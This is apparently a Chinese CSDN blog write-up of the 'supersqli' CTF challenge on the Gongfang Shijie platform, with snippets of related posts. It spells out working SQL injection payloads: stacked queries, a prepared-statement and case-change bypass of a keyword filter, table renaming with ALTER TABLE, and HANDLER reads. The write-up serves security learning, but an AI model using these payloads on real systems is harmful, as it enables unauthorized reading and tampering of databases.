攻防世界:web区supersqli

最新推荐文章于 2024-08-17 13:24:35 发布
最新推荐文章于 2024-08-17 13:24:35 发布
阅读量61 收藏
点赞数
文章标签: mysql 数据库 sql oracle jpa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120793721
版权

这题目能这么难我也是没想到
参考总结大佬的博客:https://www.cnblogs.com/joker-vip/p/12483823.html
建议读者去大佬博客看,这里只有我自己看得懂

存在坑点:

  • sqlmap无法使用
  • 对一系列命令存在过滤:return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

方法一:堆叠注入

查表:

  • -1';show tables --+

查字段:

  • -1';show columns from `1919810931114514` --+
  • -1';show columns from `words` --+

查值,需要绕过select的限制,使用预编译

  • -1';set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;#

拆分开来如下:

  • -1';
  • set @sql = CONCAT('se','lect * from 1919810931114514;');
  • prepare stmt from @sql;
  • EXECUTE stmt; #

报错,存在过滤:strstr(\$ inject, "set") && strstr($inject, "prepare")
strstr函数区分大小写,所以更改大写即可:

  • -1';sEt @sql = CONCAT('se','lect * from `1919810931114514`;');prEpare stmt from @sql;EXECUTE stmt;#

方法二:改名为易查询对象rename

会查询出words表的data列的结果。也就是类似于下面的sql语句:select * from words where id = '';

我们将表1919810931114514名字改为words,flag列名字改为id,那么就能得到flag的内容了。
修改表名和列名的语法如下:

  • 修改表名(将表名user改为users)alter table user rename to users;
  • 修改列名(将字段名username改为name)alter table users change uesrname name varchar(30);

最终payload如下1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

拆分开来如下:

  • 1';
  • alter table words rename to words1;
  • alter table `1919810931114514` rename to words;
  • alter table words change flag id varchar(50);

然后使用1' or 1=1#即可查询出flag

方法三:查找

使用handler查询,payload如下:-1';handler `1919810931114514` open;handler `1919810931114514` read first;#

Zeker62
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
攻防世界web进阶supersqli
gongjingege的博客
07-25 1848
打开链接,初步判断应该是sql注入 顺便查看一下源代码,发现sqlmap没有灵魂,估计应该不让用,得手工注入 先1’,报错 再–+,发现被正则过滤,大小写也不行 看了看大佬的wp,堆叠注入(呜,新名词。。。) inject=1’;show databases;# inject=1’;show tables;# 看一下这几个表 1’;show columns from words;# 1’;show columns from 1919810931114514;# (字符串为表名操作时要加反
攻防世界Websupersqli
Light_inthe_eyes的博客
10-15 126
题目名字提示就是SQL注入 先输入1,有回显: 判断注入类型,1'报错,1'#正常回显,说明时单字符类型注入: 判断字段的数量,1' order by 2#正常回显,1' oreder by 3#报错,说明字段量为2: 用union去 select查询,1' union select 1,database()#,发现被preg_match过滤了:正则表达式过滤了这些,那么只有采取其他方式进行注入,尝试用堆叠注入:1';show tables;#,发现有回显: 爆1919810931114514的字段:
攻防世界(CTF)~web-supersqli(详细解题思路)
m0_75030189的博客
05-10 962
mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,会一起执行。这就是堆叠注入的基本原理
攻防世界 web进阶 supersqli
m0_51395584的博客
06-16 163
攻防世界 web进阶 supersqli SQL注入中的堆叠注入。
攻防世界-web-supersqli
wuh2333的博客
06-07 932
我们看到,服务端默认的查询语句查询出两个字段,说明查询的是words表,我们将表1919810931114514的名字改成words并且将flag字段改为id字段不就行了吗?这里尝试按照基本思路进行验证,先确定注入点,然后通过union查询依次确认数据库名,表名,字段名,最终获取到我们想要的字段信息。博客里提到的一种预编译绕过的方式可以让我们绕过waf的限制使用select语句,处理起来较为复杂,这里就不详细说明了。使用 or 永真修改查询条件可以将所有信息查询出来,因此这里肯定是存在sql注入的。
【愚公系列】2023年05月 攻防世界-Websupersqli)
热门推荐
时光隧道
01-24 3万+
SQL注入攻击是一种常见的网络攻击方式,攻击者通过在用户输入的数据中插入恶意代码,从而获取数据库中的敏感信息或者执行未授权的操作。为了防范SQL注入攻击,我们应该在应用程序中使用参数化查询这样的安全措施来防范这种攻击。同时,我们还应该加强数据过滤和输入验证,以确保用户输入的数据符合预期的格式和类型。
攻防世界web高手supersqli解法(详细)
qq_53105813的博客
05-25 1832
supersqli 翻译一下为超级数据库 打开题目很明显,直接想到sql注入 验证一下猜想 提交 1’ and 1=1#和1‘ and 1=2#(输入框中没有显示在url中) 说明存在注入漏洞 接下来用order by判断字段 提交 1'order by 2# 提交 1'order by 3# 说明只有两个字段爆出 接下来尝试爆数据库名 提交: 1'union select 1,database()# 返回错误信息 return preg_mat...
攻防世界web进阶supersqli
qq_45756971的博客
07-16 427
打开题目所给链接:首先我们先探测其有无注入: 1’ 报错 1’# 正常且为True 1’ and 1=1# 正常且为True 1’ and 1=2# 正常且为False 所以它里边存在注入。 用1’ or extractvalue(rand(),concat(0x7e,database())) #爆出数据库名: 用0’; use supersqli; show tables;爆出表明:用0’; use supersqli; show columns from 1919810931114514; #
攻防世界web--supersqli
m0_60715541的博客
10-27 316
一道攻防世界上面的sql注入
黑客攻防技术宝典:Web实战篇(第2版)1
08-03
《黑客攻防技术宝典:Web实战篇(第2版)》是一本专注于Web应用程序安全的实战指南,由Dafydd Stuttard和Marcus Pinto撰写,由石华耀和傅志红翻译。该书深入浅出地探讨了Web应用程序的安全风险和攻防策略,适合网络...
攻防世界:适合作为桌面
10-08
标题“攻防世界:适合作为桌面”暗示了一个与网络安全相关的主题,可能是一个模拟实战的平台或游戏,其中用户可以通过解决各种安全问题来提升自己的技能。描述中的“misc”通常代表“miscellaneous”(杂项),表明...
攻防世界 supersqli writeup
12-14
发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
MYSQL----表的创建
最新发布
2301_80251684的博客
08-17 73
1.field字段名,也就是属性,相当于java类里面的成员属性。7.创建表中加校验------if not exists。2.一条drop语句可以删除多个表,每个表之间用逗号隔开。1.temporary 表示的是自己创建的临时表。4.字段的定义在小括号中包裹起来,最后已分号结束。3.最后一个字段的定义,结束没有逗号。6.建议每张表都设置一个编号字段。2.datetype 数据类型。如果表存在就生成一个警告信息。说明需要加''包裹起来。表示一个表的完全路径。
Java学习Day28:Mysql 第二章:斗气大陆
weixin_51721783的博客
08-16 806
设计数据库时,某一个字段属于一张表,但它同时出现另一个或多个表中,且完全等同于它在其本来所属表的意义表示尽量遵循范式理论的规约,尽可能少的冗余字段,让数据库设计看起来精致合理加入冗余字段,减少join,让数据库执行性能更好添加索引首先应考虑在 where 及 order by 涉及的列上建立索引。索引的优点大大的提高查询速度可以显著的减少查询中分组和排序的时间。索引的缺点创建索引和维护索引需要时间,而且数据量越大时间越长。
MySQL的初步认识
2301_80706853的博客
08-14 300
MySQL的初步认识
软件设计之MySQL(1)
thm19990903的博客
08-13 1036
关系型数据库(RDBMS)1、以行和列的形式存储数据,一系列的行和列被称为表,一组表组成一个库2、关系体现在表与表之间的联系,各种联系均用关系模型表示3、SQL就是关系型数据库的查询语言非关系型数据库(非RDBMS)1、主要体现为舍得2、舍体现在,非关系型数据库通常舍弃了严格的ACID、复杂的SQL查询能力3、得体现在由于没有复杂的查询和一致性要求,非关系型数据库通常在数据写入和读取的性能上表现优异;其擅长在分布式环境中进行水平扩展,可以处理大量的数据·和·高并发的请求。
信息攻防技术:Web攻击与防护
"信息攻防技术涉及信息收集、WEB攻击等多个方面,旨在保护网络安全,防止恶意攻击。天融信认证安全专业人员培训课程涵盖了信息攻防的各个方面,包括概述、传统攻击方式、WEB攻击技术、后门技术以及安全防护策略。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值